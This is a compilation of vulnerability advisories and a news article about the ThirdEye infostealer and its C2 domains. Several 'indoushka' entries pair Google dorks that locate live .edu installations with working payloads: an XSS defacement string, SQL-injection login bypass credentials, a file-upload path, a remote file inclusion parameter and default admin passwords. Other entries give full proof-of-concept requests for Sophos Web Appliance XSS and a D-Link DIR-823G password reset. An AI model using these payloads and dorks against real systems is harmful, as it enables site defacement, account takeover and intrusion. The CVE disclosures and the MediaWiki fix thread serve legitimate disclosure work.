Alumni Club Management Tools version 2.2.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 Cross Site Scripting

Alumni Club Management Tools version 2.2.7 suffers from file upload and remote SQL injection vulnerabilities.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded .[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files[+] find your files https://127.0.0.1/edu/admin_files.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a remote file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] RCE Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected File :      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] RCE : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Remote File Inclusion

Reflected cross site scripting (XSS) vulnerability was discovered in Sophos Web Appliance v4.3.9.1 that allows for arbitrary code to be inputted via the double quotes.

Vendor: Sophos

Product: Sophos Web Appliance

Version affected: 4.1.1-0.9

This worked also on the latest v4.3.9.1 version (as of 05 Jan 2020) I used Firefox Browser, 71.1(64-bit) on Windows 10.

**Product description:**

The Sophos Web Appliance is designed to function as a web proxy that provides HTTP security at. the gateway. Potentially risky content is scanned for various forms of malware.

“Sophos Web Appliance (SWA) and Sophos Management Appliance (SMA) will reach End of Life (EOL) on 20 July 2023. When this happens, the products will continue to pass traffic but will no longer receive security or software updates. Cloud services with functions such as support services and LiveConnect will be turned off.”

*   CVE ID: CVE-2023-33336
*   CWE ID: CWE-79

**Proof of Concept:**

Reflected cross-site scripting (XSS) vulnerability was discovered in the product.

It was possible to inject malicious code and input was successfully reflected between doubles quotes. It’s a systemic XSS, which definitely increases risk compared to standard XSS.

Vulnerable input section was possible to set to: status reports configuration

The following Proof of Concept (PoC) demonstrates the attack as well as displaying evidence of the script payload being returned in the response.

    Sample GET request:
    https://10.0.0.17/index.php?c=trend_suspect&period=0&section=reports" onmouseover%3dprompt(1) bad%3d"&STYLE=34f6ad4ed0b9f19a094041a234feb5e3

Authenticated reflected XSS with the privileges of admin user. Sophos Virtual Web Appliance used to demonstrate the vulnerability was the latest available from Sophos trials website.

**References:**

1.  https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)
2.  https://support.sophos.com/support/s/article/KB-000039441?language=en\_US
3.  https://docs.sophos.com/nsg/swa/help/en-us/nsg/swa/concepts/AboutYourAppliance.html

CVE-2023-33336: Cross-site scripting (XSS) in Sophos Web Appliance - 4.1.1-0.9

An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. In Special:CheckUser, a check of the "get edits" type is vulnerable to HTML injection through the User-Agent HTTP request header.

**

Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

**Steps to reproduce**

*   Modify your user agent to include HTML
*   Make a test edit or logged action
*   Load Special:CheckUser
*   Run a check using the 'get edits' type
*   Notice that the HTML isn't escaped

**Example**  
Override your user agent string (example using Firefox about:config):  

Inspecting the logged edit using inspect element:

**Other information**  
The user agent is truncated before insertion into the database at 255 bytes which could make it harder to abuse. Only occurs when running the 'get edits' check type.

Risk Rating

Medium

Author Affiliation

Wikimedia Communities

*   Mentions

**Event Timeline**

Dreamy\_Jazz renamed this task from Special:CheckUser vulnerable to HTML injection through user agent string to Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string.Mar 30 2023, 2:44 PM

Comment Actions

> Please add a SECURITY: prefix to the commit message.

Done. Updated patch provided below:  

Comment Actions

Added prefix, will deploy now. I was able to reproduce the issue and test the fix locally.

0001-SECURITY-Escape-user-agent-before-showing-in-Special.patch1 KBDownload

Comment Actions

@Reedy I wonder if we can include this in the security release that you pre-announced yesterday? Or is this too short notice? (Security deployment is currently ongoing, btw.)

Comment Actions

This fix needs backporting to 1.39 and 1.40. 1.38 and before doesn't seem to have this problem.

Comment Actions

> This fix needs backporting to 1.39 and 1.40. 1.38 and before doesn't seem to have this problem.

Agreed, I just checked the same thing. (The bug was introduced in 6d6b229c02, the old code was using htmlspecialchars( $row->cuc\_agent ) and thus safe.)

Comment Actions

The fix should be deployed on wmf.1 and wmf.2 now. (I used deploy\_security.py.)

Comment Actions

Can verify this deployed correctly.

Was able to verify without the need to spoof my user agent to include HTML as there is separate bug with the template parser that makes the user agent not display if there is a specific character (which is how I found this issue) when the value is escaped. That issue is rare (only seen it once) and isn't a security issue. Will be looking for the associated task and if not filing one.

Comment Actions

Thanks all for the quick patch and deploy.

> @Reedy I wonder if we can include this in the security release that you pre-announced yesterday? Or is this too short notice? (Security deployment is currently ongoing, btw.)

Since CheckUser isn't bundled with core, it would go out as part of a supplemental security releases (current tracking bug: T325849). I don't know if I'd agree there's any sense of urgency here - anything within the supplemental release can be made public and have backports performed once the issue has been patched in Wikimedia production. So this issue could be a part of the _next_ supplemental security release, but be disclosed and backported much sooner.

Comment Actions

> So this issue could be a part of the _next_ supplemental security release, but be disclosed and backported much sooner.

Considering that users of the release branches will be pulling the changes soon, getting this merged into the release branches before the git pull is run makes sense to me. Therefore, given that this seems to be an okay thing once it's fixed in WMF production (which it has been), I'll do as such now.

A useful side effect of getting this fix out is that it makes fixing a non-security bug easier as this method of escaping seems to prevent some unicode characters being displayed (see T333573). The temporary fix (unless I can find the core issue) would be to use htmlspecialchars to escape the value. This method would conflict with the currently deployed security patch.

Comment Actions

> Considering that users of the release branches will be pulling the changes soon, getting this merged into the release branches before the git pull is run makes sense to me. Therefore, given that this seems to be an okay thing once it's fixed in WMF production (which it has been), I'll do as such now.

That's fine - I've got it tracked for the _next_ supplemental release: T333626. Completely fine to open this up and do backports now.

sbassett changed the task status from Open to In Progress.Apr 4 2023, 8:05 PM

sbassett triaged this task as Medium priority.

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed the visibility from "Custom Policy" to "Public (No Login Required)".

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

Unsure what else might need to be done before this can be marked as resolved (i.e. removing the patch on WMF systems), but the fix has been merged and backported to all supported versions that were vulnerable.

Comment Actions

> Unsure what else might need to be done before this can be marked as resolved (i.e. removing the patch on WMF systems), but the fix has been merged and backported to all supported versions that were vulnerable.

We track Wikimedia production patches on another task and Release Engineering has a step in the train that detects when such patches should fall off. So I think this can be resolved for now.

Content licensed under Creative Commons Attribution-ShareAlike 4.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2023-37255: ⚓ T333569 Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string

Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

/churchcrm/GroupReports.php

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Linux

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.33

**What version of SQL Server are you running?**

5.7.26

**What version of ChurchCRM are you running?**

4.5.3

Description:  
XSS was detected in GroupReports.php, three hidden parameters were found in the code of this page, in which this vulnerability is possible: GroupRole, ReportModel, OnlyCart. A browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.

Impact:  
The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions

Proof of Concept:  
**<script>alert('XSS')</script>**

CVE-2023-33661: XSS exists in the group report page · Issue #6474 · ChurchCRM/CRM

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

AMSS++ 2.0 Insecure Settings

D-Link DIR-823G firmware version 1.02B05 has a password reset vulnerability, which originates from the SetMultipleActions API, allowing unauthorized attackers to reset the WEB page management password.

**DIR823G\_V1.0.2B05\_20181207.bin Reset password vulnerability****Overview**

*   Manufacturer's address：http://www.dlink.com.cn/
*   Firmware download address ： http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-823G
*   CVE：CVE-2023-26615

**Affected version**

Below is the latest firmware

**Vulnerability details**

SetMultipleActions handler function will traverse the function list, and then query whether there is a matching function in the incoming data. When SetPasswdSettings exists, the SetPasswdSettings handler will be executed.

SetPasswdSettings handler function 35 lines of code try to process the incoming password, if the processing fails, execute 53 lines of code to set the password to empty.

**Vulnerability verify**

**POC**

    POST /HNAP1/ HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
    HNAP_AUTH: 8D2D80BB8F1D63D9FF6E08DE6B821073 1675516820
    X-Requested-With: XMLHttpRequest
    Content-Length: 550
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/SNTP.html
    Cookie: uid=GcfQ7q3TwY; PrivateKey=455D512F7EA7AA45CC1B4CBB4562DE49; timeout=106
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetPasswdSettings xmlns="http://purenetworks.com/HNAP1/"><NewPassword>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NewPassword></SetPasswdSettings></SetMultipleActions></soap:Body></soap:Envelope>

CVE-2023-26615: VulIoT/D-Link/DIR823G V1.0.2B05/HNAP1/SetMultipleActions at main · 726232111/VulIoT

Alumni Club Management Tools version 2.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload  user : 'or''='@gmail.com pass : 'or''='[+] https://127.0.0.1/edu/admin.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection

By Waqas
For now, ThirdEye infostealer has demonstrated behavior that is highly malicious, albeit not-so-sophisticated in its patterns.
This is a post from HackRead.com Read the original post: Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

**While the ThirdEye infostealer is now in town, researchers have already identified several of its variants, all aiming at victims’ data.**

FortiGuard Labs uncovered a not-so-sophisticated but highly malicious infostealer while analyzing suspicious files during a cursory review. They named this ThirdEye Infostealer. According to the report authored by Fred Gutierrez, James Slaughter, and Shunichi Imano, researchers became suspicious after spotting an archive file in Russian titled “Табель учета рабочего времени.zip“, which means “time sheet” in the English language.

This file contained two additional files, both with double extensions, including a .exe extension and another document-related extension. One of these files is titled “CMK Правила оформления больничных листов.pdf.exe.”

The title means “QMS Rules for issuing sick leave” in the English language. Further investigation revealed traits that researchers had previously seen in ThirdEye infostealer samples they had been detecting since early April 2023.

**Various Versions of ThirdEye ThirdEye Infostealer Discovered**

The earliest sample of ThirdEye infostealer was discovered on 3 April 2023 at 12:36:37 GMT. This sample collected client\_hash,  OS\_type, host\_name and user\_name and sent it to C2 server “(glovatickets(.)ru/ch3ckState)” with a custom web request header: Cookie: 3rd\_eye=. It was submitted to a file scanning service on 4 April 2023.

A few weeks later, researchers found a variant which had a compile timestamp of 26 April 09:56:55 GMT. This variant collected additional data, including the BIOS vendor and release date, RAM size, CPU core number, user’s desktop files list, list of registered users on the device, and network interface data. However, this version crashes in some virtual machines.

One day later, they found a new variant with just one change: it used a PDF icon. This variant used “(ohmycars(.)ru/ch3ckState)” as C2 communications.

Later, another variant was found which gathered additional data such as total and free disk space on the C drive, domain name, network ports list, list of programs and version numbers, systemUptime, CD-ROM, drive letters volume information, currently running processes list, and programs installed in the Program Files directory.

Another file in the archive WAS titled “Табель учета рабочего времени.xls.exe,” which is a ThirdEye infostealer variant capable of performing the same activities.

Credit: FortiGuard Labs

**Functionalities of ThirdEye Infostealer**

in their blog post, FortiGuard Labs’ researchers revealed that ThirdEye Infostealer can steal system data from infected devices, including BIOS and hardware information. In addition, it can enumerate folder files, running processes, and network data.

Upon execution, the infostealer quickly gathers the data and transmits it to a C2 server hosted at “shlalala(.)ru/ch3ckState.” Apart from this, ThirdEye Infostealer does not perform any other function.

While researching, an interesting feature was noted – a string named 3rd eye, from which they derived the name of this malware family. The malware decrypts this string and uses it with another hash value to identify the C2 server. ThirdEye infostealer isn’t too sophisticated; however, it is evolving fast. Some recently collected samples stole more system data than the previously discovered versions.

Moreover, researchers noted that the infostealer targets Windows-based systems with a medium severity level. There is currently no evidence that ThirdEye Infostealer has been used in attacks.

However, since it is designed to collect data from compromised devices and systems, it can come in handy for cybercriminals in launching attacks. Researchers believe that all previous and latest variants of ThirdEye Infostealer are named in Russian, so the attacker is probably eyeing Russian-speaking organizations to deploy malware.

**RELATED ARTICLES**

1.  Legion: SMS Hijacking Malware Sold on Telegram
2.  New Jupyter infostealer dropped through MSI installer
3.  Malicious ChatGPT Installers Distribute RedLine Stealer
4.  Infostealer Adrozek malware hits Firefox, Chrome browser
5.  New MacStealer Malware Targeting macOS Catalina Devices

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#firefox